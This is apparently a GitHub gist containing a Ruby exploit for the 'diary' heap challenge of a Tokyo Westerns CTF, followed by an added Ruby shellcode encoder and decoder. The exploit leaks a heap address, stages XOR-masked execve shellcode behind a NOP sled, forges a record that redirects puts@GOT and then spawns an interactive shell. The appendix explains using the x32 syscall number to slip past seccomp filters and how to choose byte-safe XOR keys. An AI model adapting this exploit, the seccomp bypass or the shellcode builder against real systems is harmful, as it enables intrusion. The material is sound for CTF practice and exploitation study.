@david942j
Last active September 5, 2016 18:27
#!/usr/bin/env ruby
#encoding: ascii-8bit
require_relative '../zocket/zocket'
require 'pry'
require 'heapinfo'
# *- end of default code
$HOST, $PORT = 'pwn1.chal.ctf.westerns.tokyo', 13856
$local = false
# With no arguments, talk to a local instance instead of the remote challenge.
($HOST = '0'; $local = true) if ARGV.empty?
$z = Zocket.new $HOST, $PORT
def z;$z;end
$h = heapinfo('diary')  # heapinfo attaches to the local 'diary' process for debugging
def h;$h;end
#================= Exploit Start ====================
z.gets("Exit\n>> ")  # consume the banner up to the menu prompt
# Menu wrappers. Every date is in February 1970, so the day alone identifies an entry.
def add(day, sz, data)  # option 1: create an entry of sz bytes, returns the day used as its id
z.puts 1
z.puts "1970/02/%02d" % day
z.puts sz
z.write data
z.sock.flush
z.gets("Exit\n>> ", do_log: false)
day
end
def del(day)  # option 3: delete the entry for that day
z.puts 3
z.puts "1970/02/%02d" % day
z.gets("Exit\n>> ", do_log: false)
end
def show(day)  # option 2: read an entry back; returns its raw bytes
z.puts 2
z.puts "1970/02/%02d" % day
z.gets("Input date ...", do_log: false)
z.gets
s = z.gets
z.gets("Exit\n>> ", do_log: false)
p s[0..-2] # strip the trailing "\n" (p also returns the string)
end
# Leak a heap pointer: after the free/alloc/free dance below, the fresh
# 24-byte entry id3 is placed over freed memory and show() returns the
# leftover heap pointer stored there.
id = add(2, 24, 'xd')
id2 = add(4, 24, 'BB')
del(id)
id = add(2, 0x100, 'A')
del(id2)
id3 = add(6, 24, 'A')
heap_base = u64(show(id3)) & -4096  # page-align the leaked pointer
p "heap_base: %x" % heap_base
del(id)
del(id3) # make heap clean~
# Stage the payload: sm is a 24-byte placeholder, lg holds the shellcode behind
# a short jmp and a NOP sled, then sm is freed and re-carved so a forged record
# can be written over it.
sm = add(2, 24, 'small')
# execve shellcode: the path "./bash" is stored XOR 0x01 and decoded onto the stack;
# the syscall number 0x4000003b is execve (59) with the x32 ABI bit 0x40000000 set.
sc="H\xb8\x01\x01\x01\x01\x01\x01\x01\x01PH\xb8/.c`ri\x01\x01H1\x04$h;\x00\x00@XH\x89\xe71\xf6\x99\x0f\x05"
fail if sc.include?"\n"  # sanity check: the shellcode must not contain a newline byte
lg = add(4, 0x100, p64([0,0])+"\xeb\x1e".ljust(0x20,"\x90")+sc)  # 16 zero bytes, jmp +0x1e over the NOPs into sc
del(sm)
add(6, 0x60, 'BBBBBB')
puts_got = 0x602020  # puts@GOT in the non-PIE diary binary
sc_addr = heap_base+0x88  # entry point inside the lg chunk
add(8, 24, p64(puts_got-16)+p64(sc_addr)+ p64(0x20) + 0x28.chr)  # forged record: pointer near puts@GOT, shellcode address, size fields
# $stdin.gets  # uncomment to pause here and attach a debugger before the trigger
# Trigger: delete lg, then hand the socket over to the user for the shell.
z.puts 3
z.puts "1970/02/%02d" % lg
heap = nil
h.debug{
# Local only: locate the rwx mapping (the heap must be executable for the stored
# shellcode to run) and dump memory at its start.
heap = HeapInfo::Helper.maps_of(h.pid).scan(/^.*rwxp/)[0].split('-')[0].to_i(16)
h.x 20, heap if heap
}
z.interact
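Added example, not part of the gist: a small Ruby encoder and decoder for the XOR-masked execve stub stored in `sc` above, so the encoding and the syscall number can be checked outside the exploit. It assumes the 39-byte layout of that stub (two `mov rax, imm64`, `push`, `xor [rsp], rax`, `push imm32`, `pop rax`, then the register setup and `syscall`); `build_shellcode`, `choose_key` and `decode_shellcode` are names introduced here. 0x4000003b is execve (59) with the Linux x32 ABI bit 0x40000000 set; the kernel strips the bit and dispatches the same handler, which is why this form is commonly used to get past seccomp filters that compare only against the plain number.

```ruby
# Added example (not from the gist): build and pick apart the XOR-masked
# execve shellcode that the exploit stores on the heap.

# The shellcode exactly as it appears in the gist (sc = "...").
SC_FROM_PAGE = "H\xb8\x01\x01\x01\x01\x01\x01\x01\x01PH\xb8/.c`ri\x01\x01H1\x04$h;\x00\x00@XH\x89\xe71\xf6\x99\x0f\x05".b

X32_BIT    = 0x40000000  # Linux x32 ABI marker in the syscall number
SYS_EXECVE = 59

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Pick the smallest single-byte key such that neither the 8-byte mask nor the
# masked, NUL-padded path contains any byte we must avoid (NUL and newline by default).
def choose_key(path, avoid: "\x00\n")
  raw = path.b.ljust(8, "\x00")
  bad = avoid.b.bytes
  (1..255).find do |k|
    mask = [k].pack('C') * 8
    (mask.bytes + xor_bytes(raw, mask).bytes).none? { |c| bad.include?(c) }
  end
end

# Emit the 39-byte stub: decode "path\0" onto the stack, then execve(path, NULL, NULL)
# through syscall number 0x4000003b (execve with the x32 ABI bit set).
def build_shellcode(path, key)
  raise ArgumentError, 'path must be at most 7 bytes' if path.bytesize > 7
  raw  = path.b.ljust(8, "\x00")
  mask = [key].pack('C') * 8
  [
    "\x48\xb8".b + mask,                          # mov  rax, mask
    "\x50".b,                                     # push rax
    "\x48\xb8".b + xor_bytes(raw, mask),          # mov  rax, path ^ mask
    "\x48\x31\x04\x24".b,                         # xor  [rsp], rax   ; "path\0" now on the stack
    "\x68".b + [X32_BIT | SYS_EXECVE].pack('V'),  # push 0x4000003b
    "\x58".b,                                     # pop  rax          ; syscall number
    "\x48\x89\xe7".b,                             # mov  rdi, rsp     ; filename
    "\x31\xf6".b,                                 # xor  esi, esi     ; argv = NULL
    "\x99".b,                                     # cdq               ; edx = envp = NULL
    "\x0f\x05".b,                                 # syscall
  ].join
end

# Inverse: recover path, key and syscall number from a stub with the layout above,
# checking the fixed opcode bytes so that a different stub is rejected.
def decode_shellcode(sc)
  sc = sc.b
  raise 'unexpected layout' unless sc.bytesize == 39 &&
    sc[0, 2] == "\x48\xb8".b && sc[10] == "\x50".b && sc[11, 2] == "\x48\xb8".b &&
    sc[21, 4] == "\x48\x31\x04\x24".b && sc[25] == "\x68".b && sc[30] == "\x58".b
  mask = sc[2, 8]
  path = xor_bytes(sc[13, 8], mask).split("\x00".b, 2).first
  nr   = sc[26, 4].unpack1('V')
  { path: path, key: mask.getbyte(0), syscall: nr, plain_syscall: nr & ~X32_BIT }
end

if __FILE__ == $0
  info = decode_shellcode(SC_FROM_PAGE)
  puts "path=#{info[:path]} key=0x%02x syscall=0x%x (plain %d)" % [info[:key], info[:syscall], info[:plain_syscall]]
  puts "rebuilt stub matches gist: #{build_shellcode('./bash', 1) == SC_FROM_PAGE}"
end
```

`build_shellcode('./bash', 1)` reproduces the gist's bytes exactly, and `choose_key('./bash')` returns 1, which is why the author's 0x01 mask works: with key 0 the padded path would end in two NUL bytes inside the `mov` immediate. For a path containing a byte that XOR 0x01 turns into a newline (0x0b, for instance), `choose_key` moves on to the next key.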